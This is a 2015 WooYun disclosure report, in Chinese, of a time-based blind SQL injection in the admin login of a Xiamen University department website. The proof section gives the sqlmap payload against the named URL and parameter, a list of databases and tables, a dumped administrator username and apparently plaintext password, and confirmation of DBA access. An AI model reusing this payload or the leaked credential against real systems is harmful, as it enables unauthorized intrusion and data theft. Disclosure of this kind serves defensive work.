当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160541

漏洞标题:厦门大学某站SQL注入#进后台#DBA权限

相关厂商:厦门大学

漏洞作者: 路人甲

提交时间:2015-12-12 23:32

修复时间:2016-01-25 18:01

公开时间:2016-01-25 18:01

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-12: 细节已通知厂商并且等待厂商处理中
2015-12-14: 厂商已经确认,细节仅向厂商公开
2015-12-24: 细节向核心白帽子及相关领域专家公开
2016-01-03: 细节向普通白帽子公开
2016-01-13: 细节向实习白帽子公开
2016-01-25: 细节向公众公开

简要描述:

如题

详细说明:

0x01 漏洞描述

厦门大学航空系主站后台登录处SQL注入,可获数据库全部信息,可进后台,发布新闻,得服务器权限DBA


0x02 漏洞位置

http://aero.xmu.edu.cn/  问题出现在后台登录处http://aero.xmu.edu.cn/admin/login1.jsp


0x03 漏洞详细

POST注入,基于时间的盲注


0x04 漏洞利用工具

sqlmap,无需加任何脚本参数

漏洞证明:

0x05 漏洞证明
漏洞类型以及服务器信息如下

POST parameter 'u_name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 141 HTTP(s) requests:
---
Place: POST
Parameter: u_name
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: u_name=admin' AND SLEEP(5) AND 'WLWi'='WLWi&u_password=123456&u_role=admin&submit=锟斤拷录
---
[08:36:11] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11


数据库信息,5个

available databases [5]:
[*] findcampus
[*] information_schema
[*] mysql
[*] performance_schema
[*] xmuhkx


数据表信息

Database: xmuhkx
[9 tables]
+----------+
| m_menu |
| s_menu |
| t_menu |
| x_attach |
| x_news |
| x_slider |
| x_staff |
| x_sticky |
| x_user |
+----------+


可的后台管理员信息

[09:26:11] [INFO] analyzing table dump for possible password hashes
Database: xmuhkx
Table: x_user
[2 entries]
+------+--------+----------+-------------+
| u_id | u_role | u_name | u_password |
+------+--------+----------+-------------+
| 1 | admin | admin | lzraero3075 |
| 24 | yangsize | xmuaero |
+------+--------+----------+-------------+


登录后台admin账户,可管理老师帐号

MP3~4OYWS6B{~6A]K@V36(7.png


然后注入得到的权限是DBA

[09:44:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[09:45:03] [INFO] adjusting time delay to 3 seconds due to good response times
root@%
current user is DBA: True


DBA,危害性不用再多说了,点到为止……over

修复方案:

登录注入也要注意

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-12-14 09:03

厂商回复:

已通知相关单位处理。

最新状态:

暂无